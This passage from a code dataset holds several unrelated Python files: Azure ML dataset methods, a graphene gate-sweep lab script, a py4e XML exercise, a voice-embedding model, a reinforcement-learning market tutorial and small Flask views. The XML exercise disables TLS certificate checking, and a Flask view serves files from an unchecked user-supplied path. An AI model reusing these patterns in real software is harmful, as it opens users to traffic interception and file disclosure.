Run.get_context().input_datasets['input_1']\n\n .. remarks::\n\n When the dataset is created from path of a single file, the mount point will be path of the single mounted\n file. Otherwise, the mount point will be path of the enclosing folder for all the mounted files.\n\n If path_on_compute starts with a /, then it will be treated as an absolute path. If it doesn't start\n with a /, then it will be treated as a relative path relative to the working directory. If you have\n specified an absolute path, please make sure that the job has permission to write to that directory.\n\n :param path_on_compute: The target path on the compute to make the data available at.\n :type path_on_compute: str\n \"\"\"\n return (self\n .as_named_input(name=None)\n .as_mount(path_on_compute=path_on_compute))\n\n def as_download(self, path_on_compute=None):\n \"\"\"Create a DatasetConsumptionConfig with the mode set to download.\n\n In the submitted run, files in the dataset will be downloaded to local path on the compute target.\n The download location can be retrieved from argument values and the input_datasets field of the run context.\n We will automatically generate an input name. If you would like specify a custom input name, please call\n the as_named_input method.\n\n .. code-block:: python\n\n # Given a run submitted with dataset input like this:\n dataset_input = dataset.as_download()\n experiment.submit(ScriptRunConfig(source_directory, arguments=[dataset_input]))\n\n\n # Following are sample codes running in context of the submitted run:\n\n # The download location can be retrieved from argument values\n import sys\n download_location = sys.argv[1]\n\n # The download location can also be retrieved from input_datasets of the run context.\n from azureml.core import Run\n download_location = Run.get_context().input_datasets['input_1']\n\n .. remarks::\n\n When the dataset is created from path of a single file, the download location will be path of the single\n downloaded file. Otherwise, the download location will be path of the enclosing folder for all the\n downloaded files.\n\n If path_on_compute starts with a /, then it will be treated as an absolute path. If it doesn't start\n with a /, then it will be treated as a relative path relative to the working directory. If you have\n specified an absolute path, please make sure that the job has permission to write to that directory.\n\n :param path_on_compute: The target path on the compute to make the data available at.\n :type path_on_compute: str\n \"\"\"\n return (self\n .as_named_input(name=None)\n .as_download(path_on_compute=path_on_compute))\n\n @track(_get_logger, custom_dimensions={'app_name': 'FileDataset'}, activity_type=_PUBLIC_API)\n def skip(self, count):\n \"\"\"Skip file streams from the top of the dataset by the specified count.\n\n :param count: The number of file streams to skip.\n :type count: int\n :return: Returns a new FileDataset object representing a dataset with file streams skipped.\n :rtype: azureml.data.FileDataset\n \"\"\"\n return FileDataset._create(self._dataflow.skip(count), self._properties, telemetry_info=self._telemetry_info)\n\n @track(_get_logger, custom_dimensions={'app_name': 'FileDataset'}, activity_type=_PUBLIC_API)\n def take(self, count):\n \"\"\"Take a sample of file streams from top of the dataset by the specified count.\n\n :param count: The number of file streams to take.\n :type count: int\n :return: Returns a new FileDataset object representing the sampled dataset.\n :rtype: azureml.data.FileDataset\n \"\"\"\n return FileDataset._create(self._dataflow.take(count), self._properties, telemetry_info=self._telemetry_info)\n\n @track(_get_logger, custom_dimensions={'app_name': 'FileDataset'}, activity_type=_PUBLIC_API)\n def take_sample(self, probability, seed=None):\n \"\"\"Take a random sample of file streams in the dataset approximately by the probability specified.\n\n :param probability: The probability of a file stream being included in the sample.\n :type probability: float\n :param seed: An optional seed to use for the random generator.\n :type seed: int\n :return: Returns a new FileDataset object representing the sampled dataset.\n :rtype: azureml.data.FileDataset\n \"\"\"\n return FileDataset._create(\n self._dataflow.take_sample(probability, seed), self._properties, telemetry_info=self._telemetry_info)\n\n @track(_get_logger, custom_dimensions={'app_name': 'FileDataset'}, activity_type=_PUBLIC_API)\n def random_split(self, percentage, seed=None):\n \"\"\"Split file streams in the dataset into two parts randomly and approximately by the percentage specified.\n\n The first dataset returned contains approximately ``percentage`` of the total number of file references\n and the second dataset contains the remaining file references.\n\n :param percentage: The approximate percentage to split the dataset by. This must be a number between 0.0\n and 1.0.\n :type percentage: float\n :param seed: An optional seed to use for the random generator.\n :type seed: int\n :return: Returns a tuple of new FileDataset objects representing the two datasets after the split.\n :rtype: (azureml.data.FileDataset, azureml.data.FileDataset)\n \"\"\"\n dataflow1, dataflow2 = self._dataflow.random_split(percentage, seed)\n return (\n FileDataset._create(dataflow1, self._properties, telemetry_info=self._telemetry_info),\n FileDataset._create(dataflow2, self._properties, telemetry_info=self._telemetry_info)\n )\n\n\ndef _add_portable_path_column(dataflow):\n prefix_path = _find_path_prefix(dataflow)\n portable_path = 'Portable Path'\n get_portable_path = dataprep().api.functions.get_portable_path\n col = dataprep().api.expressions.col\n return dataflow.add_column(get_portable_path(col('Path'), prefix_path), portable_path, 'Path'), portable_path\n\n\ndef _find_path_prefix(dataflow):\n # TODO: move this logic to Engine\n steps = dataflow._get_steps()\n step_types = [s.step_type for s in steps]\n special_block_types = {'Microsoft.DPrep.ToCsvStreamsBlock',\n 'Microsoft.DPrep.ToParquetStreamsBlock',\n 'Microsoft.DPrep.ToDataFrameDirectoryBlock'}\n if len(special_block_types.intersection(step_types)) > 0:\n return None\n step_type = steps[0].step_type\n step_arguments = steps[0].arguments\n if hasattr(step_arguments, 'to_pod'):\n step_arguments = step_arguments.to_pod()\n path = _get_path_from_step(step_type, step_arguments)\n return None if path is None else _get_prefix(path, dataflow)\n\n\ndef _get_prefix(path, dataflow):\n \"\"\"Determine if there exists a common prefix for all files which may exist under the given path/dataflow.\n\n :param path: Path extracted from dataflow\n :param dataflow: Dataflow to get prefix for.\n :return: Path which is common prefix of all files under path/dataflow, or None if a common prefix was not found.\n \"\"\"\n from azureml.dataprep.api.errorhandlers import ExecutionError\n from azureml.dataprep.api.functions import get_portable_path\n\n if '*' in path:\n return '/'.join(re.split(r'/|\\\\', path.split('*')[0])[:-1])\n\n if path.startswith('http://') or path.startswith('https://'):\n return path[:path.rindex('/')]\n\n dataflow = dataflow.add_column(get_portable_path(dataflow['Path']), 'PortablePath', 'Path')\n paths = []\n try:\n paths = [r['PortablePath'] for r in dataflow.take(1)._to_pyrecords()]\n except ExecutionError as e:\n if 'InvalidPath' in e.error_code or 'NotFound' in e.error_code:\n return None\n raise e\n if len(paths) == 0:\n return None\n if len(paths) == 1 and paths[0].endswith(path):\n return path.replace('\\\\', '/')[:path.rindex('/')]\n return path\n\n\ndef _ensure_path(path):\n if not path or path.isspace():\n return tempfile.mkdtemp()\n return os.path.abspath(path)\n\n\ndef _encode_if_needed(path):\n sys_encoding = sys.getfilesystemencoding() or sys.getdefaultencoding()\n try:\n path.encode(sys_encoding)\n return path # no need to encode\n except (UnicodeError, LookupError):\n # Encode the path string when it contains characters which cannot be encoded by sys encoding.\n # Otherwise, usage of the path string (e.g. `os.path.exists(p)`) can encounter UnicodeEncodeError.\n return path.encode('utf8')\n","sub_path":"venv/Lib/site-packages/azureml/data/file_dataset.py","file_name":"file_dataset.py","file_ext":"py","file_size_in_byte":23130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"37587865","text":"''' This program uses KEYSIGHT B2901A to apply a gate voltage and HF2LI lock-in amplifier to measure the resistance of the sample\n\n\n\n\tHardware to be used:\n\t\t- SMU B2901A: For gating\n\t\t- A bias resistance of 1M: As voltage to current converter for lock-in out put.\n\t\t\tNote that there is always errors in reading the resitance of the device; the error is around -33% depending on the gain on S4c (see the excel file \"Calibrate S4c gain.xlsx\").\n\n\t\t- HF2LI: to measure the resistance of graphene device\n\n\n\n\n'''\nimport numpy as np\nimport zhinst.utils\n\nfrom gate_pattern import gate_pattern\n\nimport time\nfrom my_poll import R_measure as R_measure\nimport stlab\nimport os\nfrom stlab.devices.Keysight_B2901A import Keysight_B2901A\nimport matplotlib.pyplot as plt\nimport pygame, sys\nfrom pygame.locals import *\nimport math\n\n#############################################################\n''' Definitions'''\n\n# definitions\ntempdev = 0.015\nprefix = 'F17_e6_0204'\nsample_name = '2probe'\ndevice_id = 'dev352'\ntime_step = 0.1 #time step between each gate voltage steps, to stablize the gate\nramp_speed = 1500 # the safe speed for ramping the gate voltage [mV/s]\ntarget_gate = 50\nshift_voltage= 10 #in the case the intended gate pattern in not symmetrical around 0.\ngate_points = 500\nsafe_gate_current = 2.5e-6 # [A], safe current leakage limit. With in this limit, the oxide resistance below 4MOhm at 10Vg (400KOhm at 1Vg)) to be considerred not leacky!\n\n# HF2LI settings\nmeasure_amplitude = 0.1 #measurement amplitude [V]\nmeasure_output_channnel = 1\nmeasure_input_channnel = 1\nmeasure_frequency = 77 #[Hz]\ndemodulation_time_constant = 0.01\ndeamodulation_duration = 0.3\n\nbias_resistor = 1e6\ncalibration_factor = 1.45 # to compensate the shift in resistance measurement\n\n\n# output setting\ndo_plot = True\nwatch_gate_leakage = True # monitors the gate leakage and stops above the safe leakage limit\nsave_data =True\n\npygame.init()\npygame.display.set_mode((100,100))\n\n##########################################################\n''' Initializing the devices '''\n\n# initial configuration of the Lock-in\napilevel_example = 6 # The API level supported by this example.\n(daq, device, props) = zhinst.utils.create_api_session(device_id, apilevel_example, required_devtype='.*LI|.*IA|.*IS')\nzhinst.utils.api_server_version_check(daq)\nzhinst.utils.disable_everything(daq, device)\nout_mixer_channel = zhinst.utils.default_output_mixer_channel(props)\n\n\n# Keysight setting\ngate_dev = Keysight_B2901A('TCPIP::192.168.1.63::INSTR')\ngate_dev.SetModeVoltage()\ngate_dev.SetOutputOn()\ngate_dev.SetComplianceCurrent(safe_gate_current)\n\n\n#############################################################\n''' MEASUREMENT'''\n\n# generating gate pattern\npattern = gate_pattern(target_gate=target_gate, mode='double', data_points=gate_points, shift_voltage= shift_voltage )\n\n\n# Resistance measurement while modulating the gate voltage\ncount = 0 # couter of step numbers\nleakage_current = 0\n\nidstring = sample_name\nif save_data:\n\tcolnames = ['step ()','gate voltage (V)','leakage current (nA)','Resistance (k ohm)','phase ()', 'demodulation duration (s)']\n\tmy_file_2= stlab.newfile(prefix+'_',idstring,autoindex=True,colnames=colnames)\n\nramp_time = np.abs(np.floor(shift_voltage/ramp_speed))\ngate_dev.RampVoltage(shift_voltage,tt=10*ramp_time, steps = 100)\n\ngate_voltage_step = pattern['ramp_pattern'][1]-pattern['ramp_pattern'][0]\n# ramp_time = np.abs(np.floor(gate_voltage_step/ramp_speed))\nramp_time = 0.5\nplt_Vg=np.array([])\nplt_resistance=np.array([])\nplt_leak_curr=np.array([])\n\n\nEND = False\n\nfor count,gate_voltage in enumerate(pattern['ramp_pattern']): # ramping up the gate voltage\n\n\tfor event in pygame.event.get():\n\t\tif event.type == QUIT:sys.exit()\n\t\telif event.type == KEYDOWN and event.dict['key'] == 101:\n\t\t\tEND = True\n\n\tif END:\n\t\tbreak\n\n\tgate_dev.RampVoltage(gate_voltage,tt=ramp_time, steps = 5)\n\n\tleakage_current = float(gate_dev.GetCurrent()) # in the units of [A]\n\n\tprint ('\\n\\n------------------------')\n\n\n\tif watch_gate_leakage:\n\t\tif np.abs(leakage_current) > safe_gate_current:\n\t\t\tGATE_LEAKAGE = True\n\t\t\tprint ('gate current', 1e9*leakage_current, ' nA exceeds safe gate current limit reaching the gate voltage of', gate_voltage, 'V.')\n\t\t\tprint ('reseting the gate voltage')\n\t\t\tgate_dev.RampVoltage(0,tt=ramp_time, steps = 10)\n\t\t\tbreak\n\n\tprint('GATE: {:6.4f}'.format(gate_voltage), 'V')\n\n\t# time.sleep(time_step)\n\n\tmeasured = R_measure(device_id, amplitude=measure_amplitude,\n\t\tout_channel = measure_output_channnel,\n\t\tin_channel = measure_input_channnel,\n\t\ttime_constant = demodulation_time_constant,\n\t\tfrequency = measure_frequency,\n\t\tpoll_length = deamodulation_duration,\n\t\tdevice=device, daq=daq,\n\t\tout_mixer_channel=out_mixer_channel,\n\t\tbias_resistor=bias_resistor)\n\n\tmeasured[0]*=(np.cos(math.radians(measured[1]))*calibration_factor)\n\n\tline = [count,gate_voltage, leakage_current] + measured\n\n\tif save_data:\n\t\tstlab.writeline(my_file_2,line)\n\n\n\n\tprint('LEAKAGE CURRENT: {:6.4f}'.format(1e9*leakage_current), 'nA')\n\tprint('RESISTANCE: {:6.2f}'.format(measured[0]), 'kOhms')\n\tprint('PHASE {:4.2f}'.format(measured[1]))\n\n\tplt_Vg = np.append(plt_Vg,gate_voltage)\n\tplt_resistance = np.append(plt_resistance,measured[0])\n\tplt_leak_curr = np.append(plt_leak_curr,leakage_current)\n\n\tplt.rcParams[\"figure.figsize\"] = [16,9]\n\tplt.subplot(2, 1, 1)\n\tplt.plot(plt_Vg,plt_resistance, '--r',marker='o')\n\n\tplt.ylabel('Resistance (k$\\Omega$)')\n\tplt.title(prefix+'_'+sample_name)\n\n\n\tplt.subplot(2, 1, 2)\n\tplt.plot(plt_Vg,1e9*plt_leak_curr, '--r', marker='o')\n\tplt.ylabel('Leakage Current (nA)')\n\tplt.xlabel('Gate Voltage (V)')\n\tplt.title(\"Resistance = %4.2f k$\\Omega$, Leackage Current = %4.2f nA\" %(measured[0], 1e9*leakage_current))\n\n\tplt.pause(0.1)\n\n\nprint('RAMPING FINISHED')\n\ngate_dev.RampVoltage(0,tt=ramp_time) # to safely return back the gate voltage\n\n\nzhinst.utils.disable_everything(daq, device)\ngate_dev.SetOutputOff()\n\nprint('FINISHED')\n\n\n#######################################################################\n''' saving the data '''\n\nif save_data:\n\n\n\t# saving the metafile\n\tplt.savefig(os.path.dirname(my_file_2.name)+'\\\\'+prefix)\n\tmy_file_2.close()\n\n\tparameters = ['target gate (V)',\n\t\t'time step (s)',\n\t\t'gate points ()',\n\t\t'measure amplitude (V)',\n\t\t'measure frequency (Hz)',\n\t\t'bias resistor (Ohm)',\n\t\t'deamodulation duration (s)',\n\t\t'demodulation time constant (s)',\n\t\t'temperature (K)']\n\n\tT = tempdev\n\n\tparameters_line =[target_gate,\n\t\ttime_step,\n\t\tgate_points,\n\t\tmeasure_amplitude,\n\t\tmeasure_frequency,\n\t\tbias_resistor,\n\t\tdeamodulation_duration,\n\t\tdemodulation_time_constant,\n\t\tT]\n\tmy_file= stlab.newfile(prefix+'_',idstring + '_metadata',autoindex=False,colnames=parameters,usefolder=False,mypath = os.path.dirname(my_file_2.name),usedate=False)\n\tstlab.writeline(my_file,parameters_line)\n\n\t# saving the plots\n\ttitle = 'Resistance'\n\tcaption = ''\n\tstlab.autoplot(my_file_2,'gate voltage (V)','Resistance (k ohm)',title=title,caption=caption)\n\ttitle = 'Phase'\n\tcaption = ''\n\tstlab.autoplot(my_file_2,'gate voltage (V)','phase ()',title=title,caption=caption)\n\ttitle = 'Duration'\n\tcaption = ''\n\tstlab.autoplot(my_file_2,'gate voltage (V)','demodulation duration (s)',title=title,caption=caption)\n\ttitle = 'Leakage Current'\n\tcaption = ''\n\tstlab.autoplot(my_file_2,'gate voltage (V)','leakage current (nA)',title=title,caption=caption)\n\n\n\n\n\n","sub_path":"DC measurements/Others/GateGraphene_HF2LI_B2901A_v1.py","file_name":"GateGraphene_HF2LI_B2901A_v1.py","file_ext":"py","file_size_in_byte":7318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"168359554","text":"import xml.etree.ElementTree as ET\nimport urllib.request, urllib.parse, urllib.error\nimport ssl\n\nCTX = ssl.create_default_context()\nCTX.check_hostname = False\nCTX.verify_mode = ssl.CERT_NONE\n\nURL = 'http://py4e-data.dr-chuck.net/comments_227372.xml'\nData = urllib.request.urlopen(URL, context=CTX).read()\nTree = ET.fromstring(Data)\nlst = Tree.findall('comments/comment')\n\nCount = 0\nSum = 0\nfor item in lst:\n Sum = Sum + int(item.find('count').text)\n Count = Count + 1\n\nprint(Count, 'Entries!')\nprint('Sum:', Sum)\n","sub_path":"xml_test.py","file_name":"xml_test.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"545454289","text":"# ---------PATH------------\r\nROOT_DIR = '/home/daizelin/hybrid_3/'\r\nRAW_DATA = 'data/police_train.csv'\r\nTEST_DATA = 'data/police_test.csv'\r\n\r\nEMBEDDING_FILE = 'embedding/taizhou_min_count_1_window_5_300d.word2vec'\r\nTRAIN_FILE = 'output/intermediate/train.tsv'\r\nWORD2ID_FILE = 'output/intermediate/word2id.pkl'\r\nVALID_FILE = 'output/intermediate/valid.tsv'\r\nTEST_FILE = 'output/intermediate/test.tsv'\r\nLOG_PATH = 'output/logs'\r\nSTOP_WORD_LIST = 'data/stop_list_chn.txt'\r\nCHECKPOINT_DIR = 'output/checkpoints/hybrid_3.ckpt'\r\n\r\n\r\n# ---------DATA PARAM--------------\r\nis_debug = False\r\nflag_words = ['', '']\r\nmax_len = 25\r\n\r\n# ------------NET PARAM------------\r\nseed = 2018\r\ndevice = 0\r\nlabels = range(9)\r\nplot_path = 'output/img/loss_acc.jpg'\r\n### ----------ATTENTION------------\r\nattention_size = 1500\r\n### ----------CAPSULE--------------\r\n### ----------HYBRID---------------\r\n#### -------REINFORCED_CNN---------\r\nvocab_size = 1000000\r\nword_embedding_dimension = 300\r\nfilters = 32\r\ndropout = 0.2\r\nkernel_size = [3, 5, 7]\r\n#### -------REINFORCED_GRU---------\r\nhidden_size = 128\r\nbi_flag = True\r\nnum_layer = 1\r\n\r\n\r\n### -------TRAIN-------------\r\nnum_epoch = 4\r\nbatch_size = 128\r\ninitial_lr = 0.01\r\nlr_decay_mode = \"custom_decay\"\r\nuse_cuda = True\r\nuse_mem_track = False\r\n","sub_path":"hybrid_3/config/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"101872861","text":"\"\"\"Define the model.\"\"\"\n\nimport tensorflow as tf\n\nfrom voice_embedding.triplet_loss import batch_all_triplet_loss\nfrom voice_embedding.triplet_loss import batch_hard_triplet_loss\nfrom tensorflow.contrib.losses.python.metric_learning.metric_loss_ops import triplet_semihard_loss\nfrom voice_embedding.voice.constant import VOICE_STFT_T\n\n\nslim = tf.contrib.slim\n\ndef build_model(is_training, images, params):\n return build_model_vggish_slim(is_training, images, params)\n\n\ndef build_model_vggish_slim(training, images, params):\n \"\"\"Defines the VGGish TensorFlow model.\n\n All ops are created in the current default graph, under the scope 'vggish/'.\n\n The input is a placeholder named 'vggish/input_features' of type float32 and\n shape [batch_size, num_frames, num_bands] where batch_size is variable and\n num_frames and num_bands are constants, and [num_frames, num_bands] represents\n a log-mel-scale spectrogram patch covering num_bands frequency bands and\n num_frames time frames (where each frame step is usually 10ms). This is\n produced by computing the stabilized log(mel-spectrogram + params.LOG_OFFSET).\n The output is an op named 'vggish/embedding' which produces the activations of\n a 128-D embedding layer, which is usually the penultimate layer when used as\n part of a full model with a final classifier layer.\n\n Args:\n training: If true, all parameters are marked trainable.\n\n Returns:\n The op 'vggish/embeddings'.\n \"\"\"\n # Defaults:\n # - All weights are initialized to N(0, INIT_STDDEV).\n # - All biases are initialized to 0.\n # - All activations are ReLU.\n # - All convolutions are 3x3 with stride 1 and SAME padding.\n # - All max-pools are 2x2 with stride 2 and SAME padding.\n INIT_STDDEV = 0.01\n with slim.arg_scope([slim.conv2d, slim.fully_connected],\n weights_initializer=tf.truncated_normal_initializer(\n stddev=INIT_STDDEV),\n biases_initializer=tf.zeros_initializer(),\n activation_fn=tf.nn.relu,\n trainable=training), \\\n slim.arg_scope([slim.conv2d],\n kernel_size=[3, 3], stride=1, padding='SAME'), \\\n slim.arg_scope([slim.max_pool2d],\n kernel_size=[2, 2], stride=2, padding='SAME'), \\\n tf.variable_scope('vggish'):\n # Input: a batch of 2-D log-mel-spectrogram patches.\n '''\n features = tf.placeholder(\n tf.float32, shape=(None, params.NUM_FRAMES, params.NUM_BANDS),\n name='input_features')\n '''\n features = images\n # Reshape to 4-D so that we can convolve a batch with conv2d().\n net = tf.reshape(features, [-1, VOICE_STFT_T, params.signal[\"n_mels\"], 1])\n\n # The VGG stack of alternating convolutions and max-pools.\n net = slim.conv2d(net, 64, scope='conv1')\n net = slim.max_pool2d(net, scope='pool1')\n net = slim.conv2d(net, 128, scope='conv2')\n net = slim.max_pool2d(net, scope='pool2')\n net = slim.repeat(net, 2, slim.conv2d, 256, scope='conv3')\n net = slim.max_pool2d(net, scope='pool3')\n net = slim.repeat(net, 2, slim.conv2d, 512, scope='conv4')\n net = slim.max_pool2d(net, scope='pool4')\n\n # Flatten before entering fully-connected layers\n net = slim.flatten(net)\n net = slim.repeat(net, 2, slim.fully_connected, 1000, scope='fc1')\n # The embedding layer.\n net = slim.fully_connected(net, params.embedding_size, scope='fc2')\n return tf.identity(net, name='embedding')\n\n\ndef build_model_old(is_training, images, params):\n \"\"\"Compute outputs of the model (embeddings for triplet loss).\n\n Args:\n is_training: (bool) whether we are training or not\n images: (dict) contains the inputs of the graph (features)\n this can be `tf.placeholder` or outputs of `tf.data`\n params: (Params) hyperparameters\n\n Returns:\n output: (tf.Tensor) output of the model\n \"\"\"\n out = images\n # Define the number of channels of each convolution\n # For each block, we do: 3x3 conv -> batch norm -> relu -> 2x2 maxpool\n num_channels = params.num_channels\n bn_momentum = params.bn_momentum\n channels = [num_channels, num_channels * 2]\n # input has shape [batch_size, VOICE_STFT_T, params.signal[\"n_mels\"]]\n for i, c in enumerate(channels):\n with tf.variable_scope('block_{}'.format(i+1)):\n out = tf.layers.conv2d(out, c, 3, padding='same')\n if params.use_batch_norm:\n out = tf.layers.batch_normalization(out, momentum=bn_momentum, training=is_training)\n out = tf.nn.relu(out)\n out = tf.layers.max_pooling2d(out, 2, 2)\n\n assert out.shape[1:] == [int((VOICE_STFT_T-1)/4), 20, num_channels * 2], out.shape[1:]\n\n out = tf.reshape(out, [-1, int((VOICE_STFT_T-1)/4) * 20 * num_channels * 2])\n with tf.variable_scope('fc_1'):\n out = tf.layers.dense(out, params.embedding_size)\n\n return out\n\n\n\n\n\ndef model_fn(features, labels, mode, params):\n \"\"\"Model function for tf.estimator\n\n Args:\n features: input batch of images\n labels: labels of the images\n mode: can be one of tf.estimator.ModeKeys.{TRAIN, EVAL, PREDICT}\n params: contains hyperparameters of the model (ex: `params.learning_rate`)\n\n Returns:\n model_spec: tf.estimator.EstimatorSpec object\n \"\"\"\n is_training = (mode == tf.estimator.ModeKeys.TRAIN)\n\n images = tf.feature_column.input_layer(features, params.feature_columns)\n images = tf.reshape(images, [-1, VOICE_STFT_T, params.signal[\"n_mels\"], 1])\n assert images.shape[1:] == [VOICE_STFT_T, params.signal[\"n_mels\"], 1], \"{}\".format(images.shape)\n\n # -----------------------------------------------------------\n # MODEL: define the layers of the model\n with tf.variable_scope('model'):\n # Compute the embeddings with the model\n embeddings = build_model(is_training, images, params)\n embedding_mean_norm = tf.reduce_mean(tf.norm(embeddings, axis=1))\n tf.summary.scalar(\"embedding_mean_norm\", embedding_mean_norm)\n\n if mode == tf.estimator.ModeKeys.PREDICT:\n input_labels = features[\"labels\"]\n print(\"Label is: {}\".format(input_labels))\n predictions = {'embeddings': embeddings, 'labels': input_labels}\n return tf.estimator.EstimatorSpec(mode=mode, predictions=predictions)\n\n labels = tf.cast(labels, tf.int64)\n #labels = tf.Print(labels, [labels], \"Batch labels: \", summarize=10)\n '''\n freq_y, freq_idx, freq_count = tf.unique_with_counts(labels)\n labels = tf.Print(labels, [labels, freq_y, freq_count], \"Batch labels: \", summarize=50)\n '''\n \n # Define triplet loss\n if params.triplet_strategy == \"batch_all\":\n tf.logging.info(\"Triplet loss type: batch_all\")\n loss, fraction = batch_all_triplet_loss(labels, embeddings, margin=params.margin,\n squared=params.squared)\n elif params.triplet_strategy == \"batch_hard\":\n tf.logging.info(\"Triplet loss type: batch_hard\")\n loss = batch_hard_triplet_loss(labels, embeddings, margin=params.margin,\n squared=params.squared)\n elif params.triplet_strategy == \"batch_semihard\":\n tf.logging.info(\"Triplet loss type: batch_semihard\")\n loss = triplet_semihard_loss(labels, embeddings, margin=params.margin)\n else:\n raise ValueError(\"Triplet strategy not recognized: {}\".format(params.triplet_strategy))\n\n # -----------------------------------------------------------\n # METRICS AND SUMMARIES\n # Metrics for evaluation using tf.metrics (average over whole dataset)\n # TODO: some other metrics like rank-1 accuracy?\n with tf.variable_scope(\"metrics\"):\n eval_metric_ops = {\"embedding_mean_norm\": tf.metrics.mean(embedding_mean_norm)}\n\n if params.triplet_strategy == \"batch_all\":\n eval_metric_ops['fraction_positive_triplets'] = tf.metrics.mean(fraction)\n\n if mode == tf.estimator.ModeKeys.EVAL:\n return tf.estimator.EstimatorSpec(mode, loss=loss, eval_metric_ops=eval_metric_ops)\n\n\n # Summaries for training\n tf.summary.scalar('loss', loss)\n if params.triplet_strategy == \"batch_all\":\n tf.summary.scalar('fraction_positive_triplets', fraction)\n\n tf.summary.image('train_image', images, max_outputs=1)\n\n # Define training step that minimizes the loss with the Adam optimizer\n optimizer = tf.train.AdamOptimizer(params.learning_rate)\n global_step = tf.train.get_global_step()\n if params.use_batch_norm:\n # Add a dependency to update the moving mean and variance for batch normalization\n with tf.control_dependencies(tf.get_collection(tf.GraphKeys.UPDATE_OPS)):\n train_op = optimizer.minimize(loss, global_step=global_step)\n else:\n train_op = optimizer.minimize(loss, global_step=global_step)\n\n return tf.estimator.EstimatorSpec(mode, loss=loss, train_op=train_op)\n","sub_path":"TrueID/src/python/biometric/voice_embedding/voice_embedding/voice/model_fn.py","file_name":"model_fn.py","file_ext":"py","file_size_in_byte":9268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"169307637","text":"#------------------------------------------------------------------------------\n# Pylon Tutorial \"Reinforcement Learning\"\n#\n# Author: Richard Lincoln, r.w.lincoln@gmail.com\n#------------------------------------------------------------------------------\n\n__author__ = 'Richard Lincoln, r.w.lincoln@gmail.com'\n\nimport sys, logging\nfrom pylon import Case, Bus, Generator\n\nfrom pyreto import \\\n MarketExperiment, ParticipantEnvironment, ProfitTask, SmartMarket\n\nfrom pyreto.renderer import ExperimentRenderer\n\nfrom pybrain.tools.shortcuts import buildNetwork\nfrom pybrain.rl.agents import LearningAgent\nfrom pybrain.rl.learners import ENAC\n\nlogging.basicConfig(stream=sys.stdout, level=logging.DEBUG,\n format=\"%(levelname)s: %(message)s\")\n\n\"\"\" Create a simple case. \"\"\"\ng1 = Generator(name=\"G1\", p_max=60.0, p_min=0.0)\ng2 = Generator(name=\"G2\", p_max=100.0, p_min=0.0)\nbus1 = Bus(name=\"Bus1\", generators=[g1, g2], p_demand=80.0, q_demand=0.0)\ncase = Case(name=\"1Bus\", buses=[bus1])\n\n\"\"\" The market will clear submitted offers/bids and return dispatch info. \"\"\"\nmkt = SmartMarket(case)\n\nagents = []\ntasks = []\nfor g in bus1.generators:\n \"\"\" Create an environment for each agent with an asset and a market. \"\"\"\n env = ParticipantEnvironment(g, mkt, n_offbids=2)\n\n \"\"\" Create a task for the agent to achieve. \"\"\"\n task = ProfitTask(env)\n\n \"\"\" Build an artificial neural network for the agent. \"\"\"\n net = buildNetwork(task.outdim, task.indim, bias=False,\n outputbias=False)\n# net._setParameters(array([9]))\n\n \"\"\" Create a learning agent with a learning algorithm. \"\"\"\n agent = LearningAgent(module=net, learner=ENAC())\n \"\"\" Initialize parameters (variance). \"\"\"\n# agent.setSigma([-1.5])\n \"\"\" Set learning options. \"\"\"\n agent.learner.alpha = 2.0\n # agent.learner.rprop = True\n agent.actaspg = False\n# agent.disableLearning()\n\n agents.append(agent)\n tasks.append(task)\n\n\"\"\" The Experiment will coordintate the interaction of the given agents and\ntheir associated tasks. \"\"\"\nexperiment = MarketExperiment(tasks, agents, mkt)\nexperiment.setRenderer(ExperimentRenderer())\n\n\"\"\" Instruct the experiment to coordinate a set number of interactions. \"\"\"\nexperiment.doInteractions(3)\n","sub_path":"doc/tutorials/rl.py","file_name":"rl.py","file_ext":"py","file_size_in_byte":2247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"272827869","text":"from django.shortcuts import render\nfrom django.http import Http404, HttpResponse\nfrom forms import *\nfrom models import *\n\n# render home page\ndef populate_home_page(request):\n\tsuccess = 0\n\tif request.method == 'POST':\n\t\tform = NewUser(request.POST)\n\t\tif form.is_valid():\n\t\t\tu = Contact(email = form.cleaned_data['email'],)\n\t\t\tu.save()\n\t\t\tsuccess = 2\n\t\telse:\n\t\t\tform = NewUser()\n\t\t\tsuccess = 1\n\telse:\n\t\tform = NewUser()\n\n\treturn render(request, 'index.html', {'form': form, 'success': success})\n\n# deals with static files (frontend)\ndef return_static_file(request, fname):\n\ttry:\n\t\tf = open(os.path.join(os.getcwd(), fname))\n\t\treturn HttpResponse(f.read())\n\texcept:\n\t\t raise Http404(\"File \" + os.path.join(os.getcwd(), fname) + \" does not exist.\")","sub_path":"portal/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"77558301","text":"from . import mapping\nimport os\nimport matplotlib.pyplot as plt\nfrom flask import render_template\nimport base64\n\n@mapping.route('/')\ndef index():\n plt.plot([1, 2, 3, 4])\n plt.ylabel('some numbers')\n # import logging\n # logging.error('1111')\n from run import app\n app.logger.error('An error occurred')\n # raise Exception(\"自定义异常\")\n plt.savefig(os.getcwd() + '/temp/temp.jpg')\n form = \"\"\n with open(os.getcwd() + '/temp/temp.jpg','rb') as rf:\n # byte -> base64 and byte -> str\n form = base64.b64encode(rf.read()).decode(encoding=\"utf-8\")\n # 查看类型\n print(type(form))\n return render_template('mapping/mapping.html', form=form)\n\n@mapping.route('/echarts')\ndef echarts():\n form = \"\"\n return render_template('mapping/echarts.html', form=form)\n","sub_path":"app/mapping/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"523786847","text":"#!/usr/bin/env python3\n#\n# Command line calc tools programme\n#\n\n\nfrom math import *\n\n\ndef version():\n ver = 'Calc Command Line Tools V1.0'\n print(\"\\033[1;32m%s\\033[0m\" % ver)\n\n\ndef run():\n version()\n\n while True:\n cmd = 